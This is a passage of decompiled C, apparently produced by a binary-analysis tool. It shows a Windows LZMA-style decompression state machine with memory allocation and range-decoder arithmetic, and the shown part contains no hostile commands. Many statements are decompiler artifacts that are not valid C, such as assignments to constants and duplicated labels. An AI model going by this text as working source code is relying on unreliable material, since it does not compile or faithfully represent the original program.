                                                                                                                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          														goto L15;
                                                                                                                          													} else {
                                                                                                                          														goto L11;
                                                                                                                          													}
                                                                                                                          													do {
                                                                                                                          														L11:
                                                                                                                          														_t620 = _t620 - 1;
                                                                                                                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                          													} while (_t620 != 0);
                                                                                                                          													goto L12;
                                                                                                                          												}
                                                                                                                          												if( *(_t621 - 4) != 0) {
                                                                                                                          													GlobalFree( *(_t621 - 4));
                                                                                                                          												}
                                                                                                                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          												 *(_t621 - 4) = _t543;
                                                                                                                          												if(_t543 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          											case 1:
                                                                                                                          												L13:
                                                                                                                          												__eflags =  *(_t621 - 0x6c);
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													 *(_t621 - 0x88) = 1;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												_t45 = _t621 - 0x48;
                                                                                                                          												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                          												__eflags =  *_t45;
                                                                                                                          												L15:
                                                                                                                          												if( *(_t621 - 0x48) < 4) {
                                                                                                                          													goto L13;
                                                                                                                          												}
                                                                                                                          												_t555 =  *(_t621 - 0x40);
                                                                                                                          												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                          													L20:
                                                                                                                          													 *(_t621 - 0x48) = 5;
                                                                                                                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                          													goto L23;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x74) = _t555;
                                                                                                                          												if( *(_t621 - 8) != 0) {
                                                                                                                          													GlobalFree( *(_t621 - 8));
                                                                                                                          												}
                                                                                                                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                          												 *(_t621 - 8) = _t543;
                                                                                                                          												if(_t543 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													goto L20;
                                                                                                                          												}
                                                                                                                          											case 2:
                                                                                                                          												L24:
                                                                                                                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                          												 *(_t621 - 0x84) = 6;
                                                                                                                          												 *(_t621 - 0x4c) = _t562;
                                                                                                                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											case 3:
                                                                                                                          												L21:
                                                                                                                          												__eflags =  *(_t621 - 0x6c);
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													 *(_t621 - 0x88) = 3;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												_t67 = _t621 - 0x70;
                                                                                                                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												__eflags =  *_t67;
                                                                                                                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                          												L23:
                                                                                                                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                          												if( *(_t621 - 0x48) != 0) {
                                                                                                                          													goto L21;
                                                                                                                          												}
                                                                                                                          												goto L24;
                                                                                                                          											case 4:
                                                                                                                          												L133:
                                                                                                                          												_t540 =  *_t614;
                                                                                                                          												_t597 = _t540 & 0x0000ffff;
                                                                                                                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                          												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                          													 *(_t621 - 0x40) = 1;
                                                                                                                          													_t541 = _t540 - (_t540 >> 5);
                                                                                                                          													 *_t614 = _t541;
                                                                                                                          												} else {
                                                                                                                          													 *(_t621 - 0x10) = _t573;
                                                                                                                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                          												}
                                                                                                                          												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                          													goto L139;
                                                                                                                          												}
                                                                                                                          											case 5:
                                                                                                                          												goto L137;
                                                                                                                          											case 6:
                                                                                                                          												__edx = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x34) = 1;
                                                                                                                          													 *(__ebp - 0x84) = 7;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          												__esi =  *(__ebp - 0x60);
                                                                                                                          												__cl = 8;
                                                                                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          												__ecx =  *(__ebp - 0x3c);
                                                                                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												if( *(__ebp - 0x38) >= 4) {
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          														_t98 = __ebp - 0x38;
                                                                                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          														__eflags =  *_t98;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) = 0;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          												if( *(__ebp - 0x34) == __edx) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													goto L61;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          														__eflags = __eax;
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 8);
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													goto L41;
                                                                                                                          												}
                                                                                                                          											case 7:
                                                                                                                          												goto L0;
                                                                                                                          											case 8:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xa;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x38);
                                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          													 *(__ebp - 0x84) = 9;
                                                                                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          												}
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 9:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													goto L89;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x60);
                                                                                                                          												if( *(__ebp - 0x60) == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          												__eflags = _t258;
                                                                                                                          												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          												goto L75;
                                                                                                                          											case 0xa:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xb;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t621 - 0x54) = _t614;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												goto L88;
                                                                                                                          											case 0xb:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x20);
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												L88:
                                                                                                                          												__ecx =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												L89:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												 *(__ebp - 0x80) = 0x15;
                                                                                                                          												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          												goto L68;
                                                                                                                          											case 0xc:
                                                                                                                          												L99:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xc;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t334 = __ebp - 0x70;
                                                                                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t334;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												goto L101;
                                                                                                                          											case 0xd:
                                                                                                                          												L37:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xd;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t122 = __ebp - 0x70;
                                                                                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t122;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L39:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          													goto L48;
                                                                                                                          												}
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													goto L54;
                                                                                                                          												}
                                                                                                                          												L41:
                                                                                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          												 *(__ebp - 0x48) = __eax;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__eax = __eax << 8;
                                                                                                                          												__eax = __eax + __ebx;
                                                                                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edx = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													 *(__ebp - 0x40) = 1;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													__ebx = __ebx + __ebx + 1;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edx;
                                                                                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L39;
                                                                                                                          												} else {
                                                                                                                          													goto L37;
                                                                                                                          												}
                                                                                                                          											case 0xe:
                                                                                                                          												L46:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xe;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t156 = __ebp - 0x70;
                                                                                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t156;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												while(1) {
                                                                                                                          													L48:
                                                                                                                          													__eflags = __ebx - 0x100;
                                                                                                                          													if(__ebx >= 0x100) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__edx = __ebx + __ebx;
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													__esi = __edx + __eax;
                                                                                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__edi = __ax & 0x0000ffff;
                                                                                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														_t170 = __edx + 1; // 0x1
                                                                                                                          														__ebx = _t170;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __ecx;
                                                                                                                          														0x800 = 0x800 - __edi;
                                                                                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          														__ebx = __ebx + __ebx;
                                                                                                                          														 *__esi = __cx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														goto L46;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L54:
                                                                                                                          												_t173 = __ebp - 0x34;
                                                                                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          												__eflags =  *_t173;
                                                                                                                          												goto L55;
                                                                                                                          											case 0xf:
                                                                                                                          												L58:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xf;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t203 = __ebp - 0x70;
                                                                                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t203;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L60:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													L55:
                                                                                                                          													__al =  *(__ebp - 0x44);
                                                                                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												L61:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t217 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t217;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L60;
                                                                                                                          												} else {
                                                                                                                          													goto L58;
                                                                                                                          												}
                                                                                                                          											case 0x10:
                                                                                                                          												L109:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x10;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t365 = __ebp - 0x70;
                                                                                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t365;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												goto L111;
                                                                                                                          											case 0x11:
                                                                                                                          												L68:
                                                                                                                          												_t614 =  *(_t621 - 0x58);
                                                                                                                          												 *(_t621 - 0x84) = 0x12;
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 0x12:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													 *(__ebp - 0x84) = 0x13;
                                                                                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t621 - 0x54) = _t614;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          												goto L130;
                                                                                                                          											case 0x13:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													_t469 = __ebp - 0x58;
                                                                                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          													__eflags =  *_t469;
                                                                                                                          													 *(__ebp - 0x30) = 0x10;
                                                                                                                          													 *(__ebp - 0x40) = 8;
                                                                                                                          													L144:
                                                                                                                          													 *(__ebp - 0x7c) = 0x14;
                                                                                                                          													goto L145;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												 *(__ebp - 0x30) = 8;
                                                                                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          												L130:
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												 *(__ebp - 0x40) = 3;
                                                                                                                          												goto L144;
                                                                                                                          											case 0x14:
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          												__eax =  *(__ebp - 0x80);
                                                                                                                          												 *(_t621 - 0x88) = _t542;
                                                                                                                          												goto L1;
                                                                                                                          											case 0x15:
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												goto L120;
                                                                                                                          											case 0x16:
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												__eflags = __eax - 4;
                                                                                                                          												if(__eax >= 4) {
                                                                                                                          													_push(3);
                                                                                                                          													_pop(__eax);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												 *(__ebp - 0x40) = 6;
                                                                                                                          												__eax = __eax << 7;
                                                                                                                          												 *(__ebp - 0x7c) = 0x19;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L145;
                                                                                                                          											case 0x17:
                                                                                                                          												L145:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												 *(__ebp - 0x50) = 1;
                                                                                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											case 0x18:
                                                                                                                          												L146:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x18;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
